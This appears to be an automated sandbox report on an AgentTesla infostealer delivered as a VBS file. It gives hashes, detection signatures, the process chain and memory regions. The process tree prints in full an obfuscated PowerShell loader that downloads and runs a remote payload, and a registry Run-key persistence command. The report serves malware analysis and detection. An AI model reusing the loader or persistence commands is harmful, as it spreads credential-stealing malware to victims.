Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-04-2024 01:36

General

  • Target

    a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs

  • Size

    107KB

  • MD5

    445148434bd2a15989252974b9970586

  • SHA1

    d3287d54b993761e68470b518236424b93ed3379

  • SHA256

    a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e

  • SHA512

    8a9ca470269241ad4d4441151209b2a5f0dcd48b6b106567c25da61151696a9205c1c6312ae695ff139b8d425f0e841887a9479947f4c5b398d8c239cc7053ed

  • SSDEEP

    3072:W7m5h8560AY5aIFxCQCQSgX6Aaqmftp+z7bvHfVTnydFiCuA2:W7m5660AY5aIFxCOSgX6Aaqmftpg77Hj

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Lyseholderne;++$Lyseholderne;$Lyseholderne=$Lyseholderne-1;Function Fupmagers ($Ribbonfishes){$Ringsted=5;$Ringsted++;For($Blockish=5; $Blockish -lt $Ribbonfishes.Length-1; $Blockish+=$Ringsted){$Campodeiform = 'substring';$Skinmanvrer=$Ribbonfishes.$Campodeiform.Invoke($Blockish, 1);$lbesod=$lbesod+$Skinmanvrer}$lbesod;}$Foreskrivende=Fupmagers 'CompahSint tOpstat Des pAg.rksDamps:Monke/ Pini/BallodKnobbr VaesiSquamv orgie Topf.,rolog StraoCritio TaalgUdslul ,nspeSvo,l.Regalc wifto .nokmBy,og/Un miu KlepcBustu?TegumeSaltoxDescrp ,ileo RajbrSystet etap=BleacdUmiskoCohe,wRedisnIndfalfosteoHndela UdpodViktu&Untimi Alkod Semi= dfrs1FilmhULata,lPinna6Sch lW Prdi_ .efr0SpeerHBotc p stviIfor i_ServixIndbe3SeleceEvildbSatel0U resGParamMTonar_OvermBShe le LentaUdloetUnhomxOptrkg Afpr7Et gev erraIDec,sDledesSMisanM.yxoshLosse1Brist ';$Murings=$Foreskrivende.split([char]62);$Foreskrivende=$Murings[0];$Pinnaces=Fupmagers 'PenduiDram.e vejoxSkatt ';$Bugtalerens = Fupmagers 'Bludg\,lthesTa teyTastes Nonew speo EndowOve.r6 alle4A,sla\TilsvWSadduimeeksnTyphod oflloArc.dwFrakesInterPSpndso Thinw avemeUpsenr,omplSAfkalh,ffaeeSknsvlSvrddlHek.e\ L bbvOpblo1Isoph.Tu.er0churr\Allemp P,nwoSkrmmwHo,toeDianmrSpecisf,ihehToxopekongelSkandlOmreg.,ripoebedraxTranse Un d ';&($Pinnaces) (Fupmagers 'Sikke$TietsL AminuTrites Capei SulttMarteaDeictn O,saiC.eloaWardw=Komma$GradmePr.nsnunmeavResi,: M,dtw KvleiGennenElevdd Undli T.berMinis ') ;&($Pinnaces) (Fupmagers 'Landb$ deceBFremmu Turag.ilmgtBenaaaEncyclErkeneSkyldr,verieLandsnKampis Fade=Spond$Ven.iLLageruVidvisVide.iMignotmateraOverinHo.dniSacchaAcroa+ Efte$.parcBHypnouRets,gPse.dtCe tra S erlUnexpe ElskrProfieLeopanNeurosOblig ') ;&($Pinnaces) (Fupmagers 'Vedhe$St,ndCSugeph Ejena Pattl folkc H kkoTulregMa,tfrTetraapaleopUntithChaney Fir Retr,= espr Banke(Gensp(Gu.lagKritiwS,raamKammeiDoubt UnsouwProgriFedtdnBrite3 Kort2Evapo_.phodpSj ekrGneisoElectcSmaabestenks StipsStilk Raso-MedinF Chue Tofu,P Ko,nrMarino,ystecCabo e Ex.rsSvi.tsUn.erISheepdHakke=Spott$Bel s{Af.enPUdstaIVeilyDQ ain}Decum)Triaz.ReentCRecitoKrydrm,etromEnti,aSkrivn,rmbedRelabL Macri Po cnHernieFrilu)mahog Sp.gn- E.ensCominpE.uanlRigsriAnocitTank. Batte[ Dyk,c,kkomhPrtenaCon arSkrll] Nond3 .nds4Menin ');&($Pinnaces) (Fupmagers 'N,ell$XerogSRest.mSmu,skTe.plkSvenseMarc tChie, rabb=Baat. Blan$SprinCEje.phTagetaAutoglOd sscJawanoSzilagS,nscrTriarafdevap DisphcornfySugge[Tegum$ ConnCBagfjhSbeuraRer,ulValancFamilo DurigIsomorNonpea Skndp MehahDightyletha.Mettlco.ensoInte,uBefrunThirlt Aut.-Homoa2Agerk]Elem, ');&($Pinnaces) (Fupmagers ' vari$BispeSZygomaHippomGonzas Su,kiOutsanInflegBedd scath,=Jem,a(P omeTTubs.eDiabosSardit Lan -RekomPUncoma A,tetMullghHekse Anhel$Sel,sBB,tteuBredngIn.hutGelataDerell .naveOp,pirpuriteLregrns,lvbsAcamp)Unan, Sac,h-TilsyAIndesnTiltvd Rh,z karak( Rose[RundbI Sty nOuncet UddaPSelvstExegerRevan] Deko:Inspi:Dip,esDipl,i alkezAld leoveri Nasc-HaycoeMik.oqVerde Esoan8.entu)Un.xp ') ;if ($Samsings) {.$Bugtalerens $Smkket;} else {;$Udmugnings=Fupmagers 'SkrifS.forktBgretaDepotr,ntagtearoc-HomesBSemiaitvrvetPhotosOmklaT,yehorGni,taS.rignQuaggsEyenpfJu.efe Jay.rForb, Ra.gl-Dikk.S S.bpopreinu S,ekrskandcHydroenondi Thay$genreFAmaisoudtnkrNitroeNyvalsDiscok Therr.rapeiHydrav,myateEle tnResetdMilpaeBigmo Rds.l-PligtD Udpae,erips ForntBagvgiR osen Sassa M ratModifiReinvoSta.mnFlere Seme$ DannLM lliu.ichisDaundiM stntFrownaVandenPow riTensoa Ranc ';&($Pinnaces) (Fupmagers ' epti$ForsyLTonenu tr.ns Adhri,ansttUphhoa ueesnglo.eidyrsbaWinie= Epau$Ko,ceeLe con,arbavAf ad:Eval,aOr.itp Nau p.honddVandlaIdylstSuppeaFunkt ') ;&($Pinnaces) (Fupmagers ' T reI Erfam FrempMetapoMorterDam ptNonre-Mo.erM Gravo.hytodNumeruFabrilT,rmie m la ConveBoutbaiSenget BronsPelseTC,everAsc,ia ElsknSaligsBlotef PaabeTomatrHanny ') ;$Lusitania=$Lusitania+'\Rentrykningers.Jor';while (-not $Tungebaand) {&($Pinnaces) (Fupmagers 'ill.m$ GradTFla,luBuckenThemigPrygleprismbNoctuaStj.maAarssnAcromd Unst=Zoo o(UdtryT,xamie,orjas,idtstNgleo-formiP S.agaPreoctKnetchBewre Camer$HermaLTran.u liefs Notii Eye,t Retaamas enOpdiginieceaTe,pl),evem ') ;&($Pinnaces) $Udmugnings;&($Pinnaces) (Fupmagers 'HemstSTentht Afvaalude,rMistatSo em-.tormS OpsklRankee .anieFloodp,urum Aarin5F mil ');$Foreskrivende=$Murings[$Divagatory218++%$Murings.count];}&($Pinnaces) (Fupmagers 'Pyrol$ tewDDemorrEpizoiKo.ikftangot .ndes Musei Repuk U der SiloiAdjacnstringU.pleeMicror.eroesTeste Aerie= F,ge ImpuG ikieIonentc kel-SdcelCSkudloUnre n GhostFastpeBlawinTrbnkt sljd Baand$U derLAnt.au He,is PreciBru et So daFlykan unhai Razoaidoli ');&($Pinnaces) (Fupmagers 'Bill,$Miss.C .lekoErgoguElectnCotilt.tarteTremurinitip,ehanuUnde.n.ilicc Sa,mhGal ie olinr Phon Trans=punki .feme[EloigSRoutiy A ops,drejtNatureIcosamPrior.revolCBamseo PrornEpithvSko eeTissurStdnitIndpo]Kr.ft:Ar,me:Tran.FPreser Entrofedthm Tek B StrkaSpantsKred.eBe,in6Supra4 SperSSvrvgtGuldgr Minei Robin evigIndsm(ponte$SnippDAuthor babiiAntrof LeartOrkans LoggiDriblkspecirO,setiAnthrn,quipgPrveleBurlerFortrsEle.t)Tveba ');&($Pinnaces) (Fupmagers 'regis$,eleoSLivsfyXan,hdU,wonnSolske EgnsyIndv i,odudtPick,eSy.kr Daer= Smal Acrem[ RingS SubpyTel.vs.ytictJomfrePolarmKlore.Lin aTUn.edeSupe,xSnurrt,rkit.O.oleE TrannsclifcKrigsoUmteed Ov.riCathonVidaag,ajer] W az:Blt,s:VveriAP,rkiSHo otCF,derI.lausI Sjo..BetonG Cof,esweept GaulSBee ctPteryrT,puliI durnMelisgEmbos(foreg$Si.elCLe.inoT ngbu Ro.dnSpyglt.abule ,etsrBrumopModtauD fylnDemagcTungshAftereReturrKrebi) .enf ');&($Pinnaces) (Fupmagers 'Harm.$ArtsfCMbelal StetaZymossSerensTrre.mScabbaIntertInt.ne,ekno= Fors$AtollSS lvfynastid fle nNonabeBlegsyCleaniA,aintSmo reDissi.D.kansLike,uPariabsektisGrn,et,teror,repaiSa.eln tollg R.sp(Kolbt3spumi2Under7 Styr5Frapp7T,lst3 lage, Fodb2 Bryn5 Ga.a0 Elli3Abibf4Tremp)Tebor ');&($Pinnaces) $Classmate;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3932
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Lyseholderne;++$Lyseholderne;$Lyseholderne=$Lyseholderne-1;Function Fupmagers ($Ribbonfishes){$Ringsted=5;$Ringsted++;For($Blockish=5; $Blockish -lt $Ribbonfishes.Length-1; $Blockish+=$Ringsted){$Campodeiform = 'substring';$Skinmanvrer=$Ribbonfishes.$Campodeiform.Invoke($Blockish, 1);$lbesod=$lbesod+$Skinmanvrer}$lbesod;}$Foreskrivende=Fupmagers 'CompahSint tOpstat Des pAg.rksDamps:Monke/ Pini/BallodKnobbr VaesiSquamv orgie Topf.,rolog StraoCritio TaalgUdslul ,nspeSvo,l.Regalc wifto .nokmBy,og/Un miu KlepcBustu?TegumeSaltoxDescrp ,ileo RajbrSystet etap=BleacdUmiskoCohe,wRedisnIndfalfosteoHndela UdpodViktu&Untimi Alkod Semi= dfrs1FilmhULata,lPinna6Sch lW Prdi_ .efr0SpeerHBotc p stviIfor i_ServixIndbe3SeleceEvildbSatel0U resGParamMTonar_OvermBShe le LentaUdloetUnhomxOptrkg Afpr7Et gev erraIDec,sDledesSMisanM.yxoshLosse1Brist ';$Murings=$Foreskrivende.split([char]62);$Foreskrivende=$Murings[0];$Pinnaces=Fupmagers 'PenduiDram.e vejoxSkatt ';$Bugtalerens = Fupmagers 'Bludg\,lthesTa teyTastes Nonew speo EndowOve.r6 alle4A,sla\TilsvWSadduimeeksnTyphod oflloArc.dwFrakesInterPSpndso Thinw avemeUpsenr,omplSAfkalh,ffaeeSknsvlSvrddlHek.e\ L bbvOpblo1Isoph.Tu.er0churr\Allemp P,nwoSkrmmwHo,toeDianmrSpecisf,ihehToxopekongelSkandlOmreg.,ripoebedraxTranse Un d ';&($Pinnaces) (Fupmagers 'Sikke$TietsL AminuTrites Capei SulttMarteaDeictn O,saiC.eloaWardw=Komma$GradmePr.nsnunmeavResi,: M,dtw KvleiGennenElevdd Undli T.berMinis ') ;&($Pinnaces) (Fupmagers 'Landb$ deceBFremmu Turag.ilmgtBenaaaEncyclErkeneSkyldr,verieLandsnKampis Fade=Spond$Ven.iLLageruVidvisVide.iMignotmateraOverinHo.dniSacchaAcroa+ Efte$.parcBHypnouRets,gPse.dtCe tra S erlUnexpe ElskrProfieLeopanNeurosOblig ') ;&($Pinnaces) (Fupmagers 'Vedhe$St,ndCSugeph Ejena Pattl folkc H kkoTulregMa,tfrTetraapaleopUntithChaney Fir Retr,= espr Banke(Gensp(Gu.lagKritiwS,raamKammeiDoubt UnsouwProgriFedtdnBrite3 Kort2Evapo_.phodpSj ekrGneisoElectcSmaabestenks StipsStilk Raso-MedinF Chue Tofu,P Ko,nrMarino,ystecCabo e Ex.rsSvi.tsUn.erISheepdHakke=Spott$Bel s{Af.enPUdstaIVeilyDQ ain}Decum)Triaz.ReentCRecitoKrydrm,etromEnti,aSkrivn,rmbedRelabL Macri Po cnHernieFrilu)mahog Sp.gn- E.ensCominpE.uanlRigsriAnocitTank. Batte[ Dyk,c,kkomhPrtenaCon arSkrll] Nond3 .nds4Menin ');&($Pinnaces) (Fupmagers 'N,ell$XerogSRest.mSmu,skTe.plkSvenseMarc tChie, rabb=Baat. Blan$SprinCEje.phTagetaAutoglOd sscJawanoSzilagS,nscrTriarafdevap DisphcornfySugge[Tegum$ ConnCBagfjhSbeuraRer,ulValancFamilo DurigIsomorNonpea Skndp MehahDightyletha.Mettlco.ensoInte,uBefrunThirlt Aut.-Homoa2Agerk]Elem, ');&($Pinnaces) (Fupmagers ' vari$BispeSZygomaHippomGonzas Su,kiOutsanInflegBedd scath,=Jem,a(P omeTTubs.eDiabosSardit Lan -RekomPUncoma A,tetMullghHekse Anhel$Sel,sBB,tteuBredngIn.hutGelataDerell .naveOp,pirpuriteLregrns,lvbsAcamp)Unan, Sac,h-TilsyAIndesnTiltvd Rh,z karak( Rose[RundbI Sty nOuncet UddaPSelvstExegerRevan] Deko:Inspi:Dip,esDipl,i alkezAld leoveri Nasc-HaycoeMik.oqVerde Esoan8.entu)Un.xp ') ;if ($Samsings) {.$Bugtalerens $Smkket;} else {;$Udmugnings=Fupmagers 'SkrifS.forktBgretaDepotr,ntagtearoc-HomesBSemiaitvrvetPhotosOmklaT,yehorGni,taS.rignQuaggsEyenpfJu.efe Jay.rForb, Ra.gl-Dikk.S S.bpopreinu S,ekrskandcHydroenondi Thay$genreFAmaisoudtnkrNitroeNyvalsDiscok Therr.rapeiHydrav,myateEle tnResetdMilpaeBigmo Rds.l-PligtD Udpae,erips ForntBagvgiR osen Sassa M ratModifiReinvoSta.mnFlere Seme$ DannLM lliu.ichisDaundiM stntFrownaVandenPow riTensoa Ranc ';&($Pinnaces) (Fupmagers ' epti$ForsyLTonenu tr.ns Adhri,ansttUphhoa ueesnglo.eidyrsbaWinie= Epau$Ko,ceeLe con,arbavAf ad:Eval,aOr.itp Nau p.honddVandlaIdylstSuppeaFunkt ') ;&($Pinnaces) (Fupmagers ' T reI Erfam FrempMetapoMorterDam ptNonre-Mo.erM Gravo.hytodNumeruFabrilT,rmie m la ConveBoutbaiSenget BronsPelseTC,everAsc,ia ElsknSaligsBlotef PaabeTomatrHanny ') ;$Lusitania=$Lusitania+'\Rentrykningers.Jor';while (-not $Tungebaand) {&($Pinnaces) (Fupmagers 'ill.m$ GradTFla,luBuckenThemigPrygleprismbNoctuaStj.maAarssnAcromd Unst=Zoo o(UdtryT,xamie,orjas,idtstNgleo-formiP S.agaPreoctKnetchBewre Camer$HermaLTran.u liefs Notii Eye,t Retaamas enOpdiginieceaTe,pl),evem ') ;&($Pinnaces) $Udmugnings;&($Pinnaces) (Fupmagers 'HemstSTentht Afvaalude,rMistatSo em-.tormS OpsklRankee .anieFloodp,urum Aarin5F mil ');$Foreskrivende=$Murings[$Divagatory218++%$Murings.count];}&($Pinnaces) (Fupmagers 'Pyrol$ tewDDemorrEpizoiKo.ikftangot .ndes Musei Repuk U der SiloiAdjacnstringU.pleeMicror.eroesTeste Aerie= F,ge ImpuG ikieIonentc kel-SdcelCSkudloUnre n GhostFastpeBlawinTrbnkt sljd Baand$U derLAnt.au He,is PreciBru et So daFlykan unhai Razoaidoli ');&($Pinnaces) (Fupmagers 'Bill,$Miss.C .lekoErgoguElectnCotilt.tarteTremurinitip,ehanuUnde.n.ilicc Sa,mhGal ie olinr Phon Trans=punki .feme[EloigSRoutiy A ops,drejtNatureIcosamPrior.revolCBamseo PrornEpithvSko eeTissurStdnitIndpo]Kr.ft:Ar,me:Tran.FPreser Entrofedthm Tek B StrkaSpantsKred.eBe,in6Supra4 SperSSvrvgtGuldgr Minei Robin evigIndsm(ponte$SnippDAuthor babiiAntrof LeartOrkans LoggiDriblkspecirO,setiAnthrn,quipgPrveleBurlerFortrsEle.t)Tveba ');&($Pinnaces) (Fupmagers 'regis$,eleoSLivsfyXan,hdU,wonnSolske EgnsyIndv i,odudtPick,eSy.kr Daer= Smal Acrem[ RingS SubpyTel.vs.ytictJomfrePolarmKlore.Lin aTUn.edeSupe,xSnurrt,rkit.O.oleE TrannsclifcKrigsoUmteed Ov.riCathonVidaag,ajer] W az:Blt,s:VveriAP,rkiSHo otCF,derI.lausI Sjo..BetonG Cof,esweept GaulSBee ctPteryrT,puliI durnMelisgEmbos(foreg$Si.elCLe.inoT ngbu Ro.dnSpyglt.abule ,etsrBrumopModtauD fylnDemagcTungshAftereReturrKrebi) .enf ');&($Pinnaces) (Fupmagers 'Harm.$ArtsfCMbelal StetaZymossSerensTrre.mScabbaIntertInt.ne,ekno= Fors$AtollSS lvfynastid fle nNonabeBlegsyCleaniA,aintSmo reDissi.D.kansLike,uPariabsektisGrn,et,teror,repaiSa.eln tollg R.sp(Kolbt3spumi2Under7 Styr5Frapp7T,lst3 lage, Fodb2 Bryn5 Ga.a0 Elli3Abibf4Tremp)Tebor ');&($Pinnaces) $Classmate;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4172
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Undualizes% -w 1 $Sodende=(Get-ItemProperty -Path 'HKCU:\Vithard\').Befstelserne;%Undualizes% ($Sodende)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:816
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Undualizes% -w 1 $Sodende=(Get-ItemProperty -Path 'HKCU:\Vithard\').Befstelserne;%Undualizes% ($Sodende)"
              6⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:3896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkmu5dal.tfn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1244-25-0x0000000005F50000-0x0000000005FB6000-memory.dmp

    Filesize

    408KB

  • memory/1244-51-0x0000000077AA1000-0x0000000077BC1000-memory.dmp

    Filesize

    1.1MB

  • memory/1244-31-0x00000000065B0000-0x00000000065CE000-memory.dmp

    Filesize

    120KB

  • memory/1244-32-0x0000000006600000-0x000000000664C000-memory.dmp

    Filesize

    304KB

  • memory/1244-13-0x0000000075080000-0x0000000075830000-memory.dmp

    Filesize

    7.7MB

  • memory/1244-14-0x0000000005180000-0x0000000005190000-memory.dmp

    Filesize

    64KB

  • memory/1244-15-0x0000000004FF0000-0x0000000005026000-memory.dmp

    Filesize

    216KB

  • memory/1244-16-0x0000000005180000-0x0000000005190000-memory.dmp

    Filesize

    64KB

  • memory/1244-17-0x00000000057C0000-0x0000000005DE8000-memory.dmp

    Filesize

    6.2MB

  • memory/1244-18-0x00000000055E0000-0x0000000005602000-memory.dmp

    Filesize

    136KB

  • memory/1244-19-0x0000000005DF0000-0x0000000005E56000-memory.dmp

    Filesize

    408KB

  • memory/1244-46-0x0000000075080000-0x0000000075830000-memory.dmp

    Filesize

    7.7MB

  • memory/1244-47-0x0000000005180000-0x0000000005190000-memory.dmp

    Filesize

    64KB

  • memory/1244-70-0x0000000075080000-0x0000000075830000-memory.dmp

    Filesize

    7.7MB

  • memory/1244-50-0x0000000008F40000-0x000000000D314000-memory.dmp

    Filesize

    67.8MB

  • memory/1244-33-0x0000000005180000-0x0000000005190000-memory.dmp

    Filesize

    64KB

  • memory/1244-34-0x0000000007D60000-0x00000000083DA000-memory.dmp

    Filesize

    6.5MB

  • memory/1244-35-0x0000000006B50000-0x0000000006B6A000-memory.dmp

    Filesize

    104KB

  • memory/1244-36-0x0000000007620000-0x00000000076B6000-memory.dmp

    Filesize

    600KB

  • memory/1244-37-0x00000000075B0000-0x00000000075D2000-memory.dmp

    Filesize

    136KB

  • memory/1244-38-0x0000000008990000-0x0000000008F34000-memory.dmp

    Filesize

    5.6MB

  • memory/1244-39-0x0000000007B90000-0x0000000007BB2000-memory.dmp

    Filesize

    136KB

  • memory/1244-40-0x0000000007C30000-0x0000000007C44000-memory.dmp

    Filesize

    80KB

  • memory/1244-49-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

    Filesize

    4KB

  • memory/1244-48-0x0000000005180000-0x0000000005190000-memory.dmp

    Filesize

    64KB

  • memory/1244-30-0x0000000005FC0000-0x0000000006314000-memory.dmp

    Filesize

    3.3MB

  • memory/3932-41-0x00007FFEEDBE0000-0x00007FFEEE6A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3932-75-0x00007FFEEDBE0000-0x00007FFEEE6A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3932-43-0x00000193D5820000-0x00000193D5830000-memory.dmp

    Filesize

    64KB

  • memory/3932-42-0x00000193D5820000-0x00000193D5830000-memory.dmp

    Filesize

    64KB

  • memory/3932-6-0x00000193D79A0000-0x00000193D79C2000-memory.dmp

    Filesize

    136KB

  • memory/3932-12-0x00000193D5820000-0x00000193D5830000-memory.dmp

    Filesize

    64KB

  • memory/3932-11-0x00000193D5820000-0x00000193D5830000-memory.dmp

    Filesize

    64KB

  • memory/3932-44-0x00000193D5820000-0x00000193D5830000-memory.dmp

    Filesize

    64KB

  • memory/3932-10-0x00007FFEEDBE0000-0x00007FFEEE6A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4172-66-0x0000000000FB0000-0x0000000002204000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-67-0x0000000000FB0000-0x0000000002204000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-68-0x0000000077AA1000-0x0000000077BC1000-memory.dmp

    Filesize

    1.1MB

  • memory/4172-69-0x0000000000FB0000-0x0000000000FF2000-memory.dmp

    Filesize

    264KB

  • memory/4172-53-0x0000000077AA1000-0x0000000077BC1000-memory.dmp

    Filesize

    1.1MB

  • memory/4172-71-0x0000000075080000-0x0000000075830000-memory.dmp

    Filesize

    7.7MB

  • memory/4172-72-0x0000000024840000-0x0000000024850000-memory.dmp

    Filesize

    64KB

  • memory/4172-52-0x0000000077B28000-0x0000000077B29000-memory.dmp

    Filesize

    4KB

  • memory/4172-76-0x0000000024D10000-0x0000000024DA2000-memory.dmp

    Filesize

    584KB

  • memory/4172-79-0x0000000024DB0000-0x0000000024E00000-memory.dmp

    Filesize

    320KB

  • memory/4172-80-0x0000000024CF0000-0x0000000024CFA000-memory.dmp

    Filesize

    40KB

  • memory/4172-83-0x0000000075080000-0x0000000075830000-memory.dmp

    Filesize

    7.7MB

  • memory/4172-84-0x0000000024840000-0x0000000024850000-memory.dmp

    Filesize

    64KB